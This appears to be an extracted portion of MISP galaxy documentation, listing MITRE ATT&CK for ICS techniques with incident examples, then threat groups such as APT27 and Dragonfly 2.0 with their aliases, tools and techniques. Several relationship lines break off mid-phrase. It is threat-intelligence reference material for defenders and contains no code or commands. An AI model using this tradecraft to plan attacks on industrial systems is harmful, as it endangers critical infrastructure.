<td>Stuxnet was able to self-replicate by being spread through removable drives. A willing insider or unknown third party, such as a contractor, may have brought the removable media into the target environment. The earliest version of Stuxnet relied on physical installation, infecting target systems when an infected configuration file carried by a USB stick was opened.</td>
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<td><a href="https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant">https://www.sciencealert.com/multiple-computer-viruses-have-been-discovered-in-this-german-nuclear-plant</a></td>
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<td><a href="https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/">https://www.welivesecurity.com/2016/04/28/malware-found-german-nuclear-power-plant/</a></td>
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2025
Rogue Master Device

Adversaries may setup a rogue master to leverage control server functions to communicate with slave devices. A rogue master device can be used to send legitimate control messages to other control system devices, affecting processes in unintended ways. It may also be used to disrupt network communications by capturing and receiving the network traffic meant for the actual master device. Impersonating a master device may also allow an adversary to avoid detection. In the Maroochy Attack, Vitek Boden falsified network addresses in order to send false data and instructions to pumping stations.

The tag is: misp-galaxy:mitre-ics-techniques="Rogue Master Device"

Table 4245. Table References

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<td><a href="http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599">http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599</a></td>
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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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Role Identification

Adversaries may perform role identification of devices involved with physical processes of interest in a target control system. Control systems devices often work in concert to control a physical process. Each device can have one or more roles that it performs within that control process. By collecting this role-based data, an adversary can construct a more targeted attack. For example, a power generation plant may have unique devices such as one that monitors power output of a generator and another that controls the speed of a turbine. Examining devices roles allows the adversary to observe how the two devices work together to monitor and control a physical process. Understanding the role of a target device can inform the adversary's decision on what action to take, in order to cause Impact and influence or disrupt the integrity of operations. Furthermore, an adversary may be able to capture control system protocol traffic. By studying this traffic, the adversary may be able to determine which devices are outstations, and which are masters. Understanding of master devices and their role within control processes can enable the use of Rogue Master Device.

The tag is: misp-galaxy:mitre-ics-techniques="Role Identification"
Ensure ICS and IT network cables are kept separate and that devices are locked up when possible, to reduce the likelihood they can be tampered with.

https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf

**Rootkit**

Adversaries may deploy rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. Rootkits are programs that hide the existence of malware by intercepting and modifying operating-system API calls that supply system information. Rootkits or rootkit-enabling functionality may reside at the user or kernel level in the operating system, or lower. Firmware rootkits that affect the operating system yield nearly full control of the system. While firmware rootkits are normally developed for the main processing board, they can also be developed for I/O that can be attached to the asset. Compromise of this firmware allows the modification of all of the process variables and functions the module engages in. This may result in commands being disregarded and false information being fed to the main device. By tampering with device processes, an adversary may inhibit its expected response functions and possibly enable Impact.

The tag is: `misp-galaxy:mitre-ics-techniques="Rootkit"`

**Table 4247. Table References**

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<td><a href="http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html">http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html</a></td>
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### Screen Capture

Adversaries may attempt to perform screen capture of devices in the control system environment. Screenshots may be taken of workstations, HMIs, or other devices that display environment-relevant process, device, reporting, alarm, or related data. These device displays may reveal information regarding the ICS process, layout, control, and related schematics. In particular, an HMI can provide a lot of important industrial process information. Analysis of screen captures may provide the adversary with an understanding of intended operations and interactions between critical devices.

The tag is: `misp-galaxy:mitre-ics-techniques=“Screen Capture”`

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### Scripting

Adversaries may use scripting languages to execute arbitrary code in the form of a pre-written script or in the form of user-supplied code to an interpreter. Scripting languages are programming languages that differ from compiled languages, in that scripting languages use an interpreter, instead of a compiler. These interpreters read and compile part of the source code just before it is executed, as opposed to compilers, which compile each and every line of code to an executable file. Scripting allows software developers to run their code on any system where the interpreter exists. This way, they can distribute one package, instead of precompiling executables for many different systems. Scripting languages, such as Python, have their interpreters shipped as a default with many Linux distributions. In addition to being a useful tool for developers and administrators, scripting language interpreters may be abused by the adversary to execute code in the target environment. Due to the nature of scripting languages, this allows for weaponized code to be deployed to a target easily, and leaves open the possibility of on-the-fly scripting to perform a task.

The tag is: `misp-galaxy:mitre-ics-techniques=“Scripting”`

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Serial Connection Enumeration

Adversaries may perform serial connection enumeration to gather situational awareness after gaining access to devices in the OT network. Control systems devices often communicate to each other via various types of serial communication mediums. These serial communications are used to facilitate informational communication, as well as commands. Serial Connection Enumeration differs from I/O Module Discovery, as I/O modules are auxiliary systems to the main system, and devices that are connected via serial connection are normally discrete systems. While IT and OT networks may work in tandem, the exact structure of the OT network may not be discernible from the IT network alone. After gaining access to a device on the OT network, an adversary may be able to enumerate the serial connections. From this perspective, the adversary can see the specific physical devices to which the compromised device is connected to. This gives the adversary greater situational awareness and can influence the actions that the adversary can take in an attack.

The tag is: misp-galaxy:mitre-ics-techniques="Serial Connection Enumeration"

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Service Stop

Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment. Services may not allow for modification of their data stores while running. Adversaries may stop services in order to conduct Data Destruction.

The tag is: misp-galaxy:mitre-ics-techniques="Service Stop"

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<td><a href="https://attack.mitre.org/techniques/T1489/">https://attack.mitre.org/techniques/T1489/</a></td>
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Spearphishing Attachment

Adversaries may use a spearphishing attachment, a variant of spearphishing, as a form of a social engineering attack against specific targets. Spearphishing attachments are different from other forms of spearphishing in that they employ malware attached to an email. All forms of spearphishing are electronically delivered and target a specific individual, company, or industry. In this scenario, adversaries attach a file to the spearphishing email and usually rely upon User Execution to gain execution and access.

The tag is: misp-galaxy:mitre-ics-techniques="Spearphishing Attachment"

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Standard Application Layer Protocol

Adversaries may establish command and control capabilities over commonly used application layer protocols such as HTTP(S), OPC, RDP, telnet, DNP3, and modbus. These protocols may be used to disguise adversary actions as benign network traffic. Standard protocols may be seen on their
associated port or in some cases over a non-standard port. Adversaries may use these protocols to reach out of the network for command and control, or in some cases to other infected devices within the network.

The tag is: misp-galaxy:mitre-ics-techniques="Standard Application Layer Protocol"

Table 4253. Table References

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Supply Chain Compromise

Adversaries may perform supply chain compromise to gain control systems environment access by means of infected products, software, and workflows. Supply chain compromise is the manipulation of products, such as devices or software, or their delivery mechanisms before receipt by the end consumer. Adversary compromise of these products and mechanisms is done for the goal of data or system compromise, once infected products are introduced to the target environment. Supply chain compromise can occur at all stages of the supply chain, from manipulation of development tools and environments to manipulation of developed products and tools distribution mechanisms. This may involve the compromise and replacement of legitimate software and patches, such as on third party or vendor websites. Targeting of supply chain compromise can be done in attempts to infiltrate the environments of a specific audience. In control systems environments with assets in both the IT and OT networks, it is possible a supply chain compromise affecting the IT environment could enable further access to the OT environment. F-Secure Labs analyzed the approach the adversary used to compromise victim systems with Havex. The adversary planted trojanized software installers available on legitimate ICS/SCADA vendor websites. After being downloaded, this software infected the host computer with a Remote Access Trojan (RAT).

The tag is: misp-galaxy:mitre-ics-techniques="Supply Chain Compromise"

Table 4254. Table References

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System Firmware

System firmware on modern assets is often designed with an update feature. Older device firmware may be factory installed and require special reprogramming equipment. When available, the firmware update feature enables vendors to remotely patch bugs and perform upgrades. Device firmware updates are often delegated to the user and may be done using a software update package. It may also be possible to perform this task over the network. An adversary may exploit the firmware update feature on accessible devices to upload malicious or out-of-date firmware. Malicious modification of device firmware may provide an adversary with root access to a device, given firmware is one of the lowest programming abstraction layers. In the 2015 attack on the Ukrainian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries developed malicious firmware for the serial-to-ethernet devices which rendered them inoperable and severed connections between the control center and the substation.

The tag is: misp-galaxy:mitre-ics-techniques="System Firmware"

Table 4255. Table References

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Theft of Operational Information

Adversaries may steal operational information on a production environment as a direct mission outcome for personal gain or to inform future operations. This information may include design documents, schedules, rotational data, or similar artifacts that provide insight on operations. In the Bowman Dam incident, adversaries probed systems for operational data.

The tag is: misp-galaxy:mitre-ics-techniques="Theft of Operational Information"

Table 4256. Table References

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<td><a href="https://time.com/4270728/iran-cyber-attack-dam-fbi/">https://time.com/4270728/iran-cyber-attack-dam-fbi/</a></td>
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Unauthorized Command Message

Adversaries may send unauthorized command messages to instruct control systems devices to perform actions outside their expected functionality for process control. Command messages are used in ICS networks to give direct instructions to control systems devices. If an adversary can send an unauthorized command message to a control system, then it can instruct the control systems device to perform an action outside the normal bounds of the device’s actions. An adversary could potentially instruct a control systems device to perform an action that will cause an Impact. In the Maroochy Attack, the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer. In the 2015 attack on the Ukranian power grid, the adversaries gained access to the control networks of three different energy companies. The adversaries used valid credentials to seize control of operator workstations and access a distribution management system (DMS) client application via a VPN. The adversaries used these tools to issue unauthorized commands to breakers at substations which caused a loss of power to over 225,000 customers over various areas.

The tag is: misp-galaxy:mitre-ics-techniques="Unauthorized Command Message"

User Execution

Adversaries may rely on a targeted organizations’ user interaction for the execution of malicious code. User interaction may consist of installing applications, opening email attachments, or granting higher permissions to documents. Adversaries may embed malicious code or visual basic code into files such as Microsoft Word and Excel documents or software installers. Execution of this code requires that the user enable scripting or write access within the document. Embedded code may not always be noticeable to the user especially in cases of trojanized software.

The tag is: misp-galaxy:mitre-ics-techniques="User Execution"
Utilize/Change Operating Mode

Adversaries may place controllers into an alternate mode of operation to enable configuration setting changes for evasive code execution or to inhibit device functionality. Programmable controllers typically have several modes of operation. These modes can be broken down into three main categories: program run, program edit, and program write. Each of these modes puts the device in a state in which certain functions are available. For instance, the program edit mode allows alterations to be made to the user program while the device is still online. By driving a device into an alternate mode of operation, an adversary has the ability to change configuration settings in such a way to cause a Impact to equipment and/or industrial process associated with the targeted device. An adversary may also use this alternate mode to execute arbitrary code which could be used to evade defenses.

The tag is: misp-galaxy:mitre-ics-techniques="Utilize/Change Operating Mode"

Valid Accounts

Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. Adversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. The overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system. In the 2015 attack on the Ukrainian power grid, the adversaries used valid credentials to interact directly with the client application of the distribution management system (DMS) server via a VPN and native remote access services to access employee workstations hosting HMI applications.2 The adversaries caused outages at three different energy companies, causing loss of
power to over 225,000 customers over various areas.

The tag is: *misp-galaxy:mitre-ics-techniques="Valid Accounts"

**Table 4260. Table References**

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**Wireless Compromise**

Adversaries may perform wireless compromise as a method of gaining communications and unauthorized access to a wireless network. Access to a wireless network may be gained through the compromise of a wireless device.12 Adversaries may also utilize radios and other wireless communication devices on the same frequency as the wireless network. Wireless compromise can be done as an initial access vector from a remote distance. A joint case study on the Maroochy Shire Water Services event examined the attack from a cyber security perspective.3 The adversary disrupted Maroochy Shire's radio-controlled sewage system by driving around with stolen radio equipment and issuing commands with them. Boden used a two-way radio to communicate with and set the frequencies of Maroochy Shire's repeater stations. A Polish student used a modified TV remote controller to gain access to and control over the Lodz city tram system in Poland. The remote controller device allowed the student to interface with the tram's network to modify track settings and override operator control. The adversary may have accomplished this by aligning the controller to the frequency and amplitude of IR control protocol signals. The controller then enabled initial access to the network, allowing the capture and replay of tram signals.

The tag is: *misp-galaxy:mitre-ics-techniques="Wireless Compromise"

**Table 4261. Table References**

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Intrusion Set

Name of ATT&CK Group.

Intrusion Set is a cluster galaxy available in JSON format at this location. The JSON format can be freely reused in your application or automatically enabled in MISP.

authors
MITRE

Ajax Security Team - G0130

[Ajax Security Team](https://attack.mitre.org/groups/G0130) is a group that has been active since at least 2010 and believed to be operating out of Iran. By 2014 [Ajax Security Team](https://attack.mitre.org/groups/G0130) transitioned from website defacement operations to malware-based cyber espionage campaigns targeting the US defense industrial base and Iranian users of anti-censorship technologies.(Citation: FireEye Operation Saffron Rose 2013)

The tag is: *misp-galaxy:mitre-intrusion-set="Ajax Security Team - G0130"

Ajax Security Team - G0130 is also known as:

- Ajax Security Team
- Operation Woolen-Goldfish
- AjaxTM
- Rocket Kitten
- Flying Kitten
- Operation Saffron Rose

Ajax Security Team - G0130 has relationships with:

- uses: *misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: *misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Credentials from Web Browsers - T1555.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Spearphishing via Service - T1566.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="sqlmap - S0225" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="Havij - S0224" with estimative-language:likelihood-probability="almost-certain"

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The White Company - G0089

[The White Company](https://attack.mitre.org/groups/G0089) is a likely state-sponsored threat actor with advanced capabilities. From 2017 through 2018, the group led an espionage campaign called Operation Shaheen targeting government and military organizations in Pakistan. (Citation: Cylance Shaheen Nov 2018)

The tag is: misp-galaxy:mitre-intrusion-set="The White Company - G0089"

The White Company - G0089 is also known as:

- The White Company

The White Company - G0089 has relationships with:

- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"


- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
Threat Group-3390 - G0027

[Threat Group-3390](https://attack.mitre.org/groups/G0027) is a Chinese threat group that has extensively used strategic Web compromises to target victims. (Citation: Dell TG-3390) The group has been active since at least 2010 and has targeted organizations in the aerospace, government, defense, technology, energy, and manufacturing sectors. (Citation: SecureWorks BRONZE UNION June 2017) (Citation: Securelist LuckyMouse June 2018)

The tag is: `misp-galaxy:mitre-intrusion-set="Threat Group-3390 - G0027"`

Threat Group-3390 - G0027 is also known as:

- Threat Group-3390
- TG-3390
- Emissary Panda
- BRONZE UNION
- APT27
- Iron Tiger
- LuckyMouse

Threat Group-3390 - G0027 has relationships with:

- similar: `misp-galaxy:threat-actor="EMISSARY PANDA"` with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Local Account - T1087.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="OwaAuth - S0072" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="DLL Search Order Hijacking - T1574.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Exploitation for Privilege Escalation - T1068" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Data Transfer Size Limits - T1030" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-tool="ipconfig - S0100" with estimative-language:likelihood-probability="likely"
uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="LSA Secrets - T1003.004" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Network Share Connection Removal - T1070.005" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="ASPXSpy - S0073" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Keylogging - T1056.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with
uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="HTTPBrowser - S0070" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Windows Service - T1543.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="China Chopper - S0020" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="Mimikatz - S0002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Network Service Scanning - T1046" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Exploitation of Remote Services - T1210" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="pwdump - S0006" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="HyperBro - S0398" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="gh0st RAT - S0032" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-malware="ZxShell - S0412" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Remote Data Staging - T1074.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-tool="NBTscan - S0590" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Drive-by Target - T1608.004" with estimative-
Threat Group-1314 - G0028

[Threat Group-1314](https://attack.mitre.org/groups/G0028) is an unattributed threat group that has used compromised credentials to log into a victim’s remote access infrastructure. (Citation: Dell TG-1314)

The tag is: `misp-galaxy:mitre-intrusion-set="Threat Group-1314 - G0028"`

Threat Group-1314 - G0028 is also known as:

- Threat Group-1314
- TG-1314

Threat Group-1314 - G0028 has relationships with:

- uses: `misp-galaxy:mitre-tool="Net - S0039"` with estimative-language:likelihood-probability="almost-certain"
- uses: `misp-galaxy:mitre-tool="PsExec - S0029"` with estimative-language:likelihood-probability="almost-certain"
Dragonfly 2.0 - G0074

[Dragonfly 2.0](https://attack.mitre.org/groups/G0074) is a suspected Russian group that has targeted government entities and multiple U.S. critical infrastructure sectors since at least December 2015. (Citation: US-CERT TA18-074A) (Citation: Symantec Dragonfly Sept 2017) There is debate over the extent of overlap between [Dragonfly 2.0](https://attack.mitre.org/groups/G0074) and [Dragonfly](https://attack.mitre.org/groups/G0035), but there is sufficient evidence to lead to these being tracked as two separate groups. (Citation: Fortune Dragonfly 2.0 Sept 2017)(Citation: Dragos DYMALLOY)

The tag is: `misp-galaxy:mitre-intrusion-set="Dragonfly 2.0 - G0074"`

Dragonfly 2.0 - G0074 is also known as:

- Dragonfly 2.0
- IRON LIBERTY
- DYMALLOY
- Berserk Bear

Dragonfly 2.0 - G0074 has relationships with:

- uses: `misp-galaxy:mitre-attack-pattern="Masquerading - T1036" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Local Account - T1136.001" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Disable or Modify System Firewall - T1562.004" with estimative-language:likelihood-probability="almost-certain"`
- uses: `misp-galaxy:mitre-attack-pattern="Modify Registry - T1112" with estimative-`
• uses: misp-galaxy:mitre-attack-pattern="Template Injection - T1221" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote Email Collection - T1114.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Security Account Manager - T1003.002" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Remote System Discovery - T1018" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Clear Windows Event Logs - T1070.001" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Network Share Discovery - T1135" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="Impacket - S0357" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Valid Accounts - T1078" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Query Registry - T1012" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Forced Authentication - T1187" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-tool="PsExec - S0029" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Windows Command Shell - T1059.003" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Screen Capture - T1113" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="System Network Configuration Discovery - T1016" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"

• uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-
uses: misp-galaxy:mitre-attack-pattern="Shortcut Modification - T1547.009" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="netsh - S0108" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"


uses: misp-galaxy:mitre-attack-pattern="Local Data Staging - T1074.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Account Manipulation - T1098" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Commonly Used Port - T1043" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Archive Collected Data - T1560" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-tool="Reg - S0075" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Malicious Link - T1204.001" with estimative-language:likelihood-probability="almost-certain"

uses: misp-galaxy:mitre-attack-pattern="Python - T1059.006" with estimative-
Lotus Blossom - G0030

[Lotus Blossom](https://attack.mitre.org/groups/G0030) is a threat group that has targeted government and military organizations in Southeast Asia. (Citation: Lotus Blossom Jun 2015)

The tag is: `misp-galaxy:mitre-intrusion-set="Lotus Blossom - G0030"`

Lotus Blossom - G0030 is also known as:

- Lotus Blossom
- DRAGONFISH
- Spring Dragon

Lotus Blossom - G0030 has relationships with:

- similar: `misp-galaxy:threat-actor="Lotus Blossom"` with estimative-language:likelihood-probability="likely"
- uses: `misp-galaxy:mitre-malware="Elise - S0081"` with estimative-language:likelihood-probability="almost-certain"
BRONZE BUTLER - G0060

[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) is a cyber espionage group with likely Chinese origins that has been active since at least 2008. The group primarily targets Japanese organizations, particularly those in government, biotechnology, electronics manufacturing, and industrial chemistry.(Citation: Trend Micro Daserf Nov 2017)(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)

The tag is: `misp-galaxy:mitre-intrusion-set="BRONZE BUTLER - G0060"`

BRONZE BUTLER - G0060 is also known as:

- BRONZE BUTLER
- REDBALDKNIGHT
- Tick

BRONZE BUTLER - G0060 has relationships with:

- similar: misp-galaxy:threat-actor="Tick" with estimative-language:likelihood-probability="likely"
- uses: misp-galaxy:mitre-tool="cmd - S0106" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-malware="Daserf - S0187" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="Windows Credential Editor - S0005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="At (Windows) - T1053.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Match Legitimate Name or Location - T1036.005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Dead Drop Resolver - T1102.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Drive-by Compromise - T1189" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="LSASS Memory - T1003.001" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Deobfuscate/Decode Files or Information - T1140" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-tool="gsecdump - S0008" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1070.004" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Data from Local System - T1005" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="System Time Discovery - T1124" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Exploitation for Client Execution - T1203" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"
- uses: misp-galaxy:mitre-attack-pattern="Registry Run Keys / Startup Folder - T1547.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Symmetric Cryptography - T1573.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Binary Padding - T1027.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Pass the Ticket - T1550.003" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="at - S0110" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Spearphishing Attachment - T1566.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="Net - S0039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Standard Encoding - T1132.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Data from Network Shared Drive - T1039" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="PowerShell - T1059.001" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-tool="schtasks - S0111" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005" with estimative-language:likelihood-probability="almost-certain"
• uses: misp-galaxy:mitre-attack-pattern="Visual Basic - T1059.005" with estimative-language:likelihood-probability="almost-certain"
